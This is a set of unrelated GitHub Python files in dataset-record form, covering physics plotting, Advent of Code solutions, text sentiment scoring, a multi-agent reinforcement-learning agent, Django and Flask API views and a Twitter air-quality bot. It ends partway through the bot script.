wish\"),\n Laser.low_power([0],\n 2, \"\"),\n # Laser.low_power([1083, 671, 640, 766, 850, 854, 866, 649, 658, 812,\n # 780, 795, 1033, 1092, 882, 650, 935, 
718],\n # 2, \"direct sources\"),\n # Laser.low_power(np.array([626, 1178, 844, 852, 922, 814, 842, 1108, 910, 986])/2,\n # 2, \"doubled sources\"),\n # Laser.low_power(np.array([939, 855, 840, 1179, 1191, 984, 1197, 984, 1107])/3,\n # 2, \"tripled sources\"),\n # Laser.low_power(np.array([940, 1140, 1120, 916, 856, 908])/4,\n # 2, \"quadrupled sources\")\n ]\n[print(x) for x in lasers_nist]\n\n# import OPSL chips\n# not for public distribution\nopsl_path = \"C:\\\\Users\\\\jwbritto\\\\Google Drive\\\\0workSync\\\\reference\\\\tomi_laser_colors_opsl.py\"\nexec(open(opsl_path).read())\n\n# qubit and clock ions\n# from ref [0] unless otherwise noted\n# [0] http://tf.boulder.nist.gov/general/pdf/2765.pdf\n# [1] http://link.aps.org/doi/10.1103/PhysRevA.85.012502\nion_qubits = [Species(\"Be+\", {313:\"LC,RA\",\n 235:\"PI\"}),\n Species(\"Mg+\", {280:\"LC,RA\",\n 285:\"PI\"}),\n Species(\"Yb+\", {297:\"PI,LC[1]\",\n 399:\"PI\",\n 556:\"PI\",\n 328:\"LC,RA\",\n 369:\"LC,RA\",\n 935:\"RP\"}),\n Species(\"Ca+\", {422:\"PI\",\n 850:\"RP\",\n 854:\"RP\",\n 866:\"RP\",\n 393:\"LC,RA\",\n 397:\"LC,RA\"}),\n Species(\"Sr+\", {461:\"PI\",\n 407:\"LC,RA\",\n 421:\"LC,RA\",\n 1033:\"RP\",\n 1092:\"RP\"}),\n Species(\"Ba+\", {554:\"PI\",\n 455:\"LC,RA\",\n 493:\"LC,RA\",\n 650:\"RP\"})]\n[print(x) for x in ion_qubits]\n\nspecies_empty = []\n\nneutrals = [Species(\"He*\", {1083:\"LC,DP\"}),\n Species(\"Li\", {671:\"LC,RA,DP\"})]\n\n#plotit_all(lasers, ions)\n# plotit_uv_zoom(lasers_nist, ion_qubits,\n# fig_title=\"OPSLs at NIST (Burd)\")\n# plotit_uv_zoom(lasers_tomi_tested, species_empty,\n# fig_title=\"OPSLs Demonstrated by tut.fi (2015)\")\nplotit_uv_zoom(lasers_tomi_prospects, species_empty,\n fig_title=\"Anticipated OPSLs (2015, tut.fi)\")\n\n","repo_name":"nistpenning/calc","sub_path":"reference/ion_laser_colors.py","file_name":"ion_laser_colors.py","file_ext":"py","file_size_in_byte":15073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73782698049","text":"#!/usr/bin/env python3\nfrom sys import argv\n\ndef main():\n x,y = 0,0\n wx,wy = 10,1\n with open(argv[1]) as f:\n input = [line.strip() for line in f]\n for line in input:\n dir = line[0]\n dist = int(line[1:])\n if dir == 'N':\n wy += dist\n elif dir == 'S':\n wy -= dist\n elif dir == 'E':\n wx += dist\n elif dir == 'W':\n wx -= dist\n elif dir == 'L':\n for i in range((dist//90)%4):\n wx,wy = wy,wx\n wx *= -1\n elif dir == 'R':\n for i in range((dist//90)%4):\n wx,wy = wy,wx\n wy *= -1\n elif dir == 'F':\n x += dist * wx\n y += dist * wy\n print(abs(x) + abs(y))\n\nif __name__ == '__main__':\n main()","repo_name":"grvn/aoc2020","sub_path":"12/day12-2.py","file_name":"day12-2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29530137684","text":"\"\"\"\n part_1: Every elf carry a quantity of calories, find the maximum amount of it | 66487\n part_2: Top 3 elf calories | 197301\n\"\"\"\nfrom src.common.utils import SolverFunctions\n\ntitle = 'Day 1: Calorie Counting'\nparser_method = 'integers'\nhandle_data = 'paragraph'\n\n\nclass SolveTheDay(SolverFunctions): \n @staticmethod\n def helper(data):\n result = [sum(result) for result in data]\n result.sort(reverse=True)\n return result\n \n @classmethod\n def level_1(cls, data):\n result = cls.helper(data)\n result = result[:3]\n return result[0]\n\n @classmethod\n def level_2(cls, data):\n result = cls.helper(data)\n return 
sum(result[:3])\n","repo_name":"Vasile-Hij/advent_of_code","sub_path":"py/22/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70873226369","text":"import pandas as pd\r\nfrom textblob import TextBlob\r\nimport nltk\r\nnltk.download('cmudict')\r\nfrom nltk.corpus import cmudict\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.tag import pos_tag\r\nimport os\r\nimport csv\r\ndef analyze_text(file_path):\r\n # Read text from file\r\n with open(file_path, 'r') as f:\r\n text = f.read()\r\n\r\n # Create a TextBlob object\r\n blob = TextBlob(text)\r\n\r\n # Generate sentiment scores\r\n positive_score = round(blob.sentiment.polarity,2)\r\n negative_score = round(1- positive_score,2)\r\n polarity_score = round(blob.sentiment.polarity,2)\r\n subjectivity_score = round(blob.sentiment.subjectivity,2)\r\n\r\n # Generate average sentence length\r\n try :\r\n avg_sentence_length = round(sum(len(sentence.words) for sentence in blob.sentences) / len(blob.sentences),2)\r\n except ZeroDivisionError:\r\n avg_sentence_length = 0\r\n \r\n # Tokenize the text\r\n words = word_tokenize(text)\r\n\r\n # Generate complex word count\r\n d = cmudict.dict()\r\n def nsyl(word):\r\n try:\r\n return [len(list(y for y in x if y[-1].isdigit())) for x in d[word.lower()]][0]\r\n except KeyError:\r\n # Handle the case where the word is not in the dictionary\r\n return 0\r\n \r\n complex_word_count = sum(1 for word in words if nsyl(word) >= 3)\r\n \r\n # Generate FOG index\r\n def fog_index(words):\r\n complex_words = 0\r\n for word in words:\r\n if len(word) >= 3:\r\n if any(c.isalpha() and c.isupper() for c in word):\r\n complex_words += 1\r\n try :\r\n return round(0.4 * ( (len(words) / len(nltk.sent_tokenize(text))) + (100 * (complex_words / len(words))) ),2)\r\n except ZeroDivisionError:\r\n return 0\r\n\r\n\r\n fog = fog_index(words)\r\n \r\n # Generate average number of words per sentence\r\n try:\r\n avg_num_words_per_sentence = round(len(words) / len(nltk.sent_tokenize(text)),2)\r\n except ZeroDivisionError:\r\n avg_num_words_per_sentence = 0 \r\n \r\n # Generate word count\r\n word_count = len(words)\r\n \r\n # Generate syllable per word\r\n try :\r\n syllable_per_word = round(sum(nsyl(word) for word in words) / word_count,2)\r\n except ZeroDivisionError:\r\n syllable_per_word = 0\r\n \r\n # Generate personal pronouns\r\n personal_pronouns = sum(1 for word, pos in pos_tag(words) if pos == 'PRP')\r\n \r\n # Generate average word length\r\n try:\r\n avg_word_length = round(sum(len(word) for word in words) / word_count,2)\r\n except ZeroDivisionError:\r\n avg_word_length = 0\r\n \r\n #Generate percentage of complex words\r\n try:\r\n per_complex_words = round(((complex_word_count/word_count)*100),2)\r\n except ZeroDivisionError:\r\n per_complex_words = 0\r\n \r\n # Create a dataframe to store the scores\r\n # scores = pd.DataFrame({'POSITIVE SCORE' : [positive_score],\r\n # 'NEGATIVE SCORE' : [negative_score],\r\n # 'POLARITY SCORE' : [polarity_score],\r\n # 'SUBJECTIVITY SCORE' : [subjectivity_score],\r\n # 'AVG SENTENCE LENGTH' : [avg_sentence_length],\r\n # 'PERCENTAGE OF COMPLEX WORDS' : [per_complex_words],\r\n # 'FOG INDEX' : [fog],\r\n # 'AVG NUMBER OF WORDS PER SENTENCE' : [avg_num_words_per_sentence],\r\n # 'COMPLEX WORD COUNT' : [complex_word_count],\r\n # 'WORD COUNT' : [word_count],\r\n # 'SYLLABLE PER WORD' : [syllable_per_word],\r\n # 'PERSONAL PRONOUNS' : 
[personal_pronouns],\r\n # 'AVG WORD LENGTH' : [avg_word_length]})\r\n scores = {'POSITIVE SCORE' : positive_score,\r\n 'NEGATIVE SCORE' : negative_score,\r\n 'POLARITY SCORE' : polarity_score,\r\n 'SUBJECTIVITY SCORE' : subjectivity_score,\r\n 'AVG SENTENCE LENGTH' : avg_sentence_length,\r\n 'PERCENTAGE OF COMPLEX WORDS' : per_complex_words,\r\n 'FOG INDEX' : fog,\r\n 'AVG NUMBER OF WORDS PER SENTENCE' : avg_num_words_per_sentence,\r\n 'COMPLEX WORD COUNT' : complex_word_count,\r\n 'WORD COUNT' : word_count,\r\n 'SYLLABLE PER WORD' : syllable_per_word,\r\n 'PERSONAL PRONOUNS' : personal_pronouns,\r\n 'AVG WORD LENGTH' : avg_word_length}\r\n return scores\r\n\r\n# Create an empty dataframe\r\nscores = pd.DataFrame(columns=['POSITIVE SCORE','NEGATIVE SCORE','POLARITY SCORE',\r\n 'SUBJECTIVITY SCORE','AVG SENTENCE LENGTH','PERCENTAGE OF COMPLEX WORDS',\r\n 'FOG INDEX','AVG NUMBER OF WORDS PER SENTENCE','COMPLEX WORD COUNT', 'WORD COUNT',\r\n 'SYLLABLE PER WORD', 'PERSONAL PRONOUNS', 'AVG WORD LENGTH'])\r\n\r\ndef get_text_files(directory):\r\n text_files = []\r\n for file in os.listdir(directory):\r\n if file.endswith(\".txt\"):\r\n text_files.append(file)\r\n text_files_list = text_files[51:144] + text_files[0:51]\r\n return text_files_list\r\n# print(get_text_files(\"extract\"))\r\n\r\n# print(f'extract/{get_text_files(\"extract\")[0]}')\r\n# print(f'extract/{get_text_files(\"extract\")[0]}.txt')\r\n\r\nfor i in range(len(get_text_files(\"extract\"))):\r\n path = f'extract/{get_text_files(\"extract\")[i]}'\r\n with open(path, 'r') as f:\r\n analysis = analyze_text(path)\r\n # print(analysis)\r\n scores = scores.append(analysis, ignore_index=True)\r\n print(scores)\r\n\r\n\r\nscores.to_excel(\"scores.xlsx\", sheet_name='Sheet1')\r\n# Read the existing Excel file\r\nexisting_df = pd.read_excel('Output Data.xlsx')\r\n\r\n# Concatenate the existing dataframe with the new one containing the scores\r\nresult_df = pd.concat([existing_df, scores], axis=1)\r\n\r\n# Save the resulting dataframe to an Excel file\r\nresult_df.to_excel('Output Data Structure.xlsx', index=False)\r\n\r\n \r\n \r\n","repo_name":"heathbrew/Text-Analysis-of-Online-Articles","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"71276310530","text":"import random\n\nimport wandb\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.optim as optim\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom .utils import update_model\nfrom .actor_critic import Actor, Critic\nfrom .replay_memory import ReplayMemory\n\nclass MADDPGAgent(nn.Module):\n def __init__(self, device, agents, obs_dims, action_dims, lr,\n gamma=0.99, eps=1.0, eps_decay=0.9, eps_min=0.05, batch_size=800, tau=0.001):\n super(MADDPGAgent, self).__init__()\n\n self.device = device\n self.agents = agents\n self.n_agents = len(self.agents)\n self.obs_dims = obs_dims\n self.action_dims = action_dims\n\n self.lr = lr\n self.gamma = gamma\n self.eps = eps\n self.eps_decay = eps_decay\n self.eps_min = eps_min\n self.batch_size = batch_size\n self.tau = tau\n self.step = 0\n self.decay_step = 2000\n\n self.actor = nn.ModuleDict({agent: Actor(self.obs_dims[agent], self.action_dims[agent]).to(self.device) for agent in self.agents})\n self.target_actor = nn.ModuleDict({agent: Actor(self.obs_dims[agent], self.action_dims[agent]).to(self.device) for agent in 
self.agents})\n for agent in self.agents:\n update_model(self.actor[agent], self.target_actor[agent], tau=1.0)\n\n self.critic = nn.ModuleDict({agent: Critic(self.obs_dims[agent] * self.n_agents + self.action_dims[agent] * self.n_agents, 1).to(self.device) for agent in self.agents})\n self.target_critic = nn.ModuleDict({agent: Critic(self.obs_dims[agent] * self.n_agents + self.action_dims[agent] * self.n_agents, 1).to(self.device) for agent in self.agents})\n for agent in self.agents:\n update_model(self.critic[agent], self.target_critic[agent], tau=1.0)\n\n self.mse_loss = nn.MSELoss()\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=1e-4)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=1e-4)\n\n self.memory = ReplayMemory(self.agents, capacity=125000, device=self.device)\n\n def select_action(self, state):\n actions, action_norms = {}, {}\n for agent in self.agents:\n obs = torch.from_numpy(state[agent]).float().unsqueeze(0).to(self.device)\n if random.random() < self.eps:\n action = np.zeros(self.action_dims[agent])\n action[random.randint(0, self.action_dims[agent]-1)] = 1.0\n else:\n action = self.actor[agent](obs).detach().cpu().numpy().squeeze(0)\n action_norm = action.argmax()\n \n actions[agent] = action\n action_norms[agent] = action_norm\n return actions, action_norms\n\n def push(self, transition):\n self.memory.push(transition)\n\n def train_start(self):\n return len(self.memory) >= self.batch_size\n\n def train(self):\n states, actions, next_states, rewards, dones = self.memory.sample(self.batch_size)\n\n total_value_loss = 0.0\n total_policy_loss = 0.0\n\n for target_agent in self.agents:\n joint_state = torch.cat([states[agent] for agent in self.agents], dim=-1)\n joint_actions = torch.cat([actions[agent] for agent in self.agents], dim=-1)\n current_q_values = self.critic[target_agent](torch.cat([joint_state, joint_actions], dim=-1))\n\n joint_next_state = torch.cat([next_states[agent] for agent in self.agents], dim=-1)\n joint_next_actions = torch.cat([self.target_actor[agent](next_states[agent]) for agent in self.agents], dim=-1)\n next_q_values = self.target_critic[target_agent](torch.cat([joint_next_state, joint_next_actions], dim=-1)).detach()\n target_q_values = rewards[target_agent] + self.gamma * next_q_values * (1 - dones[target_agent])\n # Add Normalization\n target_q_values = (target_q_values - target_q_values.mean()) / target_q_values.std()\n\n value_loss = self.mse_loss(target_q_values, current_q_values)\n self.critic_optimizer.zero_grad()\n value_loss.backward()\n clip_grad_norm_(self.critic.parameters(), 10.0)\n self.critic_optimizer.step()\n\n joint_actions = []\n for agent in self.agents:\n if agent == target_agent:\n joint_actions.append(self.actor[agent](states[agent]))\n else:\n joint_actions.append(actions[agent])\n joint_actions = torch.cat(joint_actions, dim=-1)\n\n policy_loss = -self.critic[target_agent](torch.cat([joint_state, joint_actions], dim=1)).mean()\n self.actor_optimizer.zero_grad()\n policy_loss.backward()\n clip_grad_norm_(self.actor.parameters(), 10.0)\n self.actor_optimizer.step()\n\n update_model(self.actor[target_agent], self.target_actor[target_agent], tau=self.tau)\n update_model(self.critic[target_agent], self.target_critic[target_agent], tau=self.tau)\n\n total_value_loss += value_loss.item()\n total_policy_loss += policy_loss.item()\n\n if self.step % self.decay_step == 0:\n if self.eps > self.eps_min:\n self.eps *= self.eps_decay\n else:\n self.eps = self.eps_min\n self.step += 1\n\n return 
total_policy_loss / self.n_agents, total_value_loss / self.n_agents, self.eps\n\n def write(self, reward, policy_loss, value_loss):\n wandb.log({'Reward': reward,\n 'Actor Loss': policy_loss, 'Critic Loss': value_loss})\n\n def __str__(self):\n return \"MADDPG\"","repo_name":"dbsxodud-11/Multi-Agent-RL","sub_path":"algorithms/MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"11676656105","text":"from h5py import File\nfrom matplotlib.pyplot import *\n\nfh = File('series/series_s1.h5','r')\n\nt = fh['scales/sim_time'][:]\n\nke = fh['tasks/ke'][:,0,0]\nens = fh['tasks/enstrophy'][:,0,0]\n\nfig,ax = subplots()\n\nplot (t,ke)\nplot (t,ens)\n\nshow()","repo_name":"gvn22/k-flow","sub_path":"plot_series.py","file_name":"plot_series.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24429965054","text":"#!/usr/bin/env python3\n\"\"\"\nIn math, the factorial of a number is defined as the product of an integer and all the integers below it. For example, the factorial of four (4!) is equal to 1*2*3*4=24.\nLet's make the factorial function return the right number.\n\"\"\"\ndef factorial(n):\n result = 1\n for i in range (1,n+1):\n result = result * i\n return result\n\nprint(factorial(10)) # should be 3628800\nprint(factorial(2)) # should be 2\nprint(factorial(7)) # should be 5040","repo_name":"phuongvo9/python-google-automation-","sub_path":"crash-course/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31751429477","text":"import random as rd\nimport numpy as np\nimport copy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nfrom sim.heroes import Team, Hero\nfrom sim.processing import Game\n\nheroes = [Hero.__dict__[key] for key in Hero.__dict__ if '__' not in key and 'empty' not in key]\nranks = [32, 23, 18, 20, 7, 5,\n 38, 4, 33, 19, 11, 29, 2,\n 9, 3, 37, 8, 40, 31,\n 13, 21, 17, 41, 24, 27,\n 35, 39, 25, 22, 6, 16,\n 26, 14, 1, 15, 12, 36,\n 34, 28, 30, 10]\nn_heroes = len(heroes)\n\n\ndef get_random_team():\n return Team([rd.choice(heroes)() for _ in range(6)])\n\n\nmodel = Sequential()\nmodel.add(Dense(32, input_dim=6 * n_heroes, activation='sigmoid'))\nmodel.add(Dense(n_heroes, activation='sigmoid'))\nmodel.compile(loss='mse', optimizer='adam', metrics=['mae'])\n\n\ndef get_next_hero(model, eps, state, actions):\n if rd.random() < eps:\n a = rd.randint(0, n_heroes - 1)\n while a in actions:\n a = rd.randint(0, n_heroes - 1)\n else:\n scores = model.predict(state)[0]\n scores[actions] = 0\n a = np.argmax(scores)\n\n return a\n\n\ndef train_model(model, n_battles=10000, mode='vs_self', eps=0.5, decay=0.9998):\n scores = []\n for i in range(n_battles):\n actions = []\n op_actions = []\n state = np.zeros((1, 6 * n_heroes))\n op_state = np.zeros((1, 6 * n_heroes))\n eps *= decay\n if i % 100 == 0:\n print(\"Battle {} of {}\".format(i + 1, n_battles))\n\n for turn in range(6):\n a = get_next_hero(model, eps, state, actions)\n op_a = get_next_hero(model, eps, op_state, op_actions)\n actions.append(a)\n op_actions.append(op_a)\n\n if turn < 5:\n new_state = copy.copy(state)\n new_state[0][n_heroes * turn + a] = 1\n new_op_state = copy.copy(op_state)\n new_op_state[0][n_heroes * turn + op_a] = 1\n target 
= np.max(np.delete(model.predict(new_state)[0], actions))\n op_target = np.max(np.delete(model.predict(new_op_state)[0], op_actions))\n\n else:\n team = Team([heroes[a]() for a in actions])\n if mode == 'vs_self':\n op_team = Team([heroes[op_a]() for op_a in op_actions])\n elif mode == 'vs_random':\n op_team = get_random_team()\n else:\n raise Warning('Unknown training mode')\n game = Game(team, op_team)\n game.process()\n target = (game.winner + 1) / 2\n op_target = 1 - target\n\n target_vec = model.predict(state)[0]\n target_vec[actions[-1]] = target\n model.fit(state, target_vec.reshape((1, n_heroes)), epochs=1, verbose=0)\n\n if mode == 'vs_self':\n op_target_vec = model.predict(op_state)[0]\n op_target_vec[op_actions[-1]] = op_target\n model.fit(op_state, op_target_vec.reshape((1, n_heroes)), epochs=1, verbose=0)\n\n state = new_state\n op_state = new_op_state\n\n scores.append(sum([ranks[a] for a in actions + op_actions]))\n\n return scores\n\n\ndef get_prediction(model):\n actions = []\n state = np.zeros((1, 6 * n_heroes))\n for turn in range(6):\n scores = model.predict(state)[0]\n scores[actions] = 0\n a = np.argmax(scores)\n actions.append(a)\n state[0][n_heroes * turn + a] = 1\n\n return Team([heroes[a]() for a in actions])\n","repo_name":"Ashargin/SimTapTap","sub_path":"rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"72430839169","text":"import logging\n\nfrom rest_framework import generics, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom core.apps.common.common_functions import pillar_response\nfrom core.apps.common.enums.service_enum import ServiceType\nfrom core.apps.common.utils import (\n get_user,\n get_user_from_session_destroy_session_variable,\n get_user_metadata,\n log_extra_fields,\n make_context,\n update_user_metadata_cache,\n)\nfrom core.apps.user_auth.models import UserAuthModel\nfrom core.apps.user_profile.models import UserActivityLog\n\nfrom ...enums.notification_type_enum import NotificationTypeEnum\nfrom ...models import PushNotificationLog\nfrom ...services import (\n DeactivateInAppNotificationService,\n InAppNotificationSevice,\n NotificationPanelService,\n NotificationService,\n PushNotificationService,\n PushNotificationSettingService,\n create_notification,\n get_user_notification,\n get_user_notification_list,\n update_user_notification,\n)\nfrom .serializers import UserNotificationSerializer\n\nlogger = logging.getLogger(__name__)\n\n\nclass NotificationView(APIView):\n # Create Notifications\n def post(self, request):\n logger.info(f\"Got request to send notifications {request.data}\")\n\n user_code = request.data.get(\"user_code\")\n payment = request.data.get(\"payment\", None)\n notification_type_enum_code = request.data.get(\"notification_type_enum_code\")\n notification_title = request.data.get(\"notification_title\")\n notification_message = request.data.get(\"notification_message\")\n data = request.data.get(\"data\")\n try:\n user_auth = UserAuthModel.objects.filter(\n is_active=True, code=user_code\n ).last()\n create_notification(\n user_auth=user_auth,\n notification_type_enum=NotificationTypeEnum.get_notification_type_enum_from_code(\n notification_type_enum_code\n ),\n notification_title=notification_title,\n notification_message=notification_message,\n data=data,\n payment=payment,\n )\n error, msg, data = False, \"Created notifications successfully\", 
None\n except Exception as e:\n logger.info(f\" Exception occurs = {e}\")\n error, msg, data = (\n True,\n \"Unable to create notifications, Please check server log\",\n None,\n )\n\n return Response(make_context(error=error, message=msg, data=data))\n\n\nclass UserNotificationView(generics.GenericAPIView):\n serializer_class = UserNotificationSerializer\n\n def get(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n error, msg, data = get_user_notification(user)\n\n return Response(make_context(error, msg, data))\n\n def post(self, request, notification_id):\n user = get_user_from_session_destroy_session_variable(request)\n error, msg, data = update_user_notification(user, notification_id, request)\n\n return Response(make_context(error, msg, data))\n\n\nclass SyncView(APIView):\n activity_code = UserActivityLog.ActivityCode.SYNC_INIT\n\n @pillar_response(activity_code)\n def post(self, request):\n \"\"\"Sync user actions view\"\"\"\n\n user_id = request.session[\"user_id\"]\n\n # try:\n # user_actions = sync_user_actions(user)\n # except Exception as e:\n # logger.error(f\"Could not sync user actions. Exception: {str(e)}\")\n user_actions = []\n\n user_metadata = get_user_metadata(user_id)\n\n if user_metadata:\n logger.info(f\"found user meta data for {user_id}\")\n user_metadata_hash = user_metadata.hash\n response = dict(\n user_metadata_hash=user_metadata_hash,\n actions=user_actions,\n cache_id=user_metadata.cache_id,\n )\n else:\n response = dict(\n user_metadata_hash=None,\n actions=user_actions,\n cache_id=0,\n )\n return response\n\n\nclass SyncUpdateView(APIView):\n @pillar_response()\n def post(self, request):\n user_id_list = request.data.get(\"user_id_list\", [])\n update_user_metadata_cache(user_id_list)\n\n\nclass PushNotificationAcknowledgeView(APIView):\n def post(self, request, push_notification_id):\n \"\"\"Push notification acknowledgement view\"\"\"\n\n user = get_user_from_session_destroy_session_variable(request)\n\n try:\n user_push_notification = PushNotificationLog.objects.get(\n user_auth=user, id=push_notification_id\n )\n except PushNotificationLog.DoesNotExist:\n error, msg, data = True, \"No notification found with the id\", None\n else:\n user_push_notification.notification_status = (\n PushNotificationLog.NotificationStatus.ACKNOWLEDGED\n )\n user_push_notification.save(\n update_fields=[\"notification_status\", \"updated_at\"]\n )\n\n error, msg, data = False, \"\", None\n\n return Response(make_context(error, msg, data))\n\n\nclass PushNotificationView(APIView):\n def post(self, request):\n \"\"\"Push notification view\"\"\"\n\n user_id = request.session[\"user_id\"]\n try:\n user_auth = UserAuthModel.objects.filter(code=user_id).last()\n PushNotificationService(\n user_auth\n ).send_push_notification_from_other_service(request)\n response = make_context(False, \"Successfully sent push notification\", None)\n except Exception as e:\n message = \"Failed to send push notification\"\n logger.exception(\n \"Failed to send push notification\",\n extra=log_extra_fields(\n request_url=request.path,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n user_id=user_id,\n ),\n )\n response = make_context(True, message, None)\n return Response(response)\n\n\nclass NewNotificationView(APIView):\n def post(self, request):\n \"\"\"Notification view\"\"\"\n\n user_id = request.session[\"user_id\"]\n try:\n NotificationService(user_id).create_notification(request)\n response = make_context(False, \"Successfully created 
notification\", None)\n except Exception as e:\n message = \"Failed to send push notification\"\n logger.exception(\n \"Failed to send push notification\",\n extra=log_extra_fields(\n request_url=request.path,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n user_id=user_id,\n ),\n )\n response = make_context(True, message, None)\n return Response(response)\n\n\nclass DeviceTokenView(APIView):\n def post(self, request):\n \"\"\"Store or update user device token\"\"\"\n\n user_id = request.session[\"user_id\"]\n user_auth = UserAuthModel.objects.filter(code=user_id).last()\n\n old_token = request.data.get(\"old_token\", None)\n new_token = request.data.get(\"new_token\", None)\n token_type = request.data.get(\"token_type\", \"\").lower()\n\n PushNotificationSettingService(\n user_auth=user_auth, user_id=user_id\n ).update_push_notification_setting(token_type, old_token, new_token)\n\n error, msg, data = False, \"Device token saved successfully\", None\n return Response(make_context(error, msg, data))\n\n\nclass NotificationListView(APIView):\n def get(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n last_id = int(request.GET.get(\"last_id\", 0))\n\n try:\n notification_list = get_user_notification_list(user, last_id)\n response = make_context(\n False, \"Notification list returned successfully\", notification_list\n )\n status_code = status.HTTP_200_OK\n except Exception as e:\n logger.exception(\n f\"Failed to return notification list where previous page \"\n f\"last notification id: {last_id}\",\n extra=log_extra_fields(\n service_type=ServiceType.API.value,\n exception_message=str(e),\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n ),\n )\n response = make_context(True, \"Could not return notification list\", None)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return Response(response, status=status_code)\n\n\nclass InAppNotificationView(APIView):\n @pillar_response()\n def get(self, request):\n \"\"\"get all in app notification list\"\"\"\n notification_data = InAppNotificationSevice(request).get_notification_list()\n return notification_data\n\n @pillar_response()\n def post(self, request):\n \"\"\"create new in app notification\"\"\"\n return InAppNotificationSevice(request).create_notification()\n\n @pillar_response()\n def patch(self, request):\n \"\"\"update in app notification action\"\"\"\n InAppNotificationSevice(request).update_notification()\n\n @pillar_response()\n def delete(self, request):\n \"\"\"deactivate in app notification\"\"\"\n InAppNotificationSevice(request).deactivate_notification()\n\n\nclass NotificationPanelView(APIView):\n @pillar_response()\n def get(self, request):\n \"\"\"get notification data\"\"\"\n panel_data = NotificationPanelService(\n user_id=get_user(request=request)\n ).get_notification_panel_data()\n return panel_data\n\n\nclass DeactivateInAppNotificationView(APIView):\n @pillar_response()\n def post(self, request):\n \"\"\"deactivate in app notification\"\"\"\n data = DeactivateInAppNotificationService(request).deactivate_notification()\n return data\n","repo_name":"yass-arafat/code-samples","sub_path":"core/apps/notification/api/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34251878549","text":"from flask import Blueprint, flash, redirect, url_for\nfrom src.models.user import requires_login\n\npayment_blueprint 
= Blueprint('payments', __name__)\n\n\n@payment_blueprint.route('/success')\n@requires_login\ndef payment_successful():\n flash(\"Your payment was successful!\", \"green\")\n return redirect(url_for('credits.index'))\n\n\n@payment_blueprint.route('/cancelled')\n@requires_login\ndef payment_cancelled():\n flash(\"Your payment was cancelled!\", \"yellow\")\n return redirect(url_for('credits.index'))\n","repo_name":"r3sdev/pricewatch","sub_path":"src/views/payments.py","file_name":"payments.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33339309499","text":"from logging import info, basicConfig, INFO\nfrom threading import Thread\nfrom time import sleep\nimport concurrent.futures\n\n\ndef thread_function(name):\n info(f\"Thread {name} starting... \")\n sleep(2)\n info(f\"Thread {name} stopped... \")\n\n\nformat = \"%(asctime)s: %(message)s\"\nbasicConfig(format=format, level=INFO, datefmt=\"%h:%M:%S\")\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n #executor.map(thread_function, range(3))\n for x in range(3):\n executor.submit(thread_function,x)\nprint('done')\n","repo_name":"vbmchik/pythin","sub_path":"day31/day31_9.py","file_name":"day31_9.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20691082913","text":"\n\nimport tweepy as twitter\nimport requests\nimport asyncio\nimport time\nimport json\nimport keys\nimport re\n\ncity = ''\naqual = None\nerror_msg = None\n\ndef get_data():\n new_data = None\n response = requests.get(\n f'http://api.waqi.info/feed/{city}/?token={keys.API_TOKEN}')\n data = response.text\n parse_json = json.loads(data)\n # print(parse_json['status'], 'here')\n if parse_json['status'] == 'error':\n err_reply()\n elif parse_json['status'] == 'ok':\n for key in parse_json.keys():\n if key == 'data':\n new_data = (key, parse_json[key])\n aqual = new_data[1]['aqi']\n return aqual\n\n \nauth = twitter.OAuthHandler(keys.api_key, keys.api_secret)\nauth.set_access_token(keys.access_token, keys.access_token_secret)\napi = twitter.API(auth, wait_on_rate_limit=True)\n\nFILE = \"id.txt\"\n\nwhile True:\n def retrieve_id(file):\n f_read = open(file, \"r\")\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\n def store_id(id, file):\n f_write = open(file, \"w\")\n f_write.write(str(id))\n f_write.close()\n return\n\n def reply():\n api.update_status(\n (f'@{mention.user.screen_name} PM2.5 Air Quality Index in {city} is currently {aqual} '), mention.id)\n print('Replied to @ ' + mention.user.screen_name)\n\n def err_reply():\n print('there was an error')\n api.update_status(\n (f'@{mention.user.screen_name} It seems there was touble retrieving data for the city of {city} '), mention.id)\n print('Replied to @ ' + mention.user.screen_name)\n\n last_seen_id = retrieve_id(FILE)\n mentions = 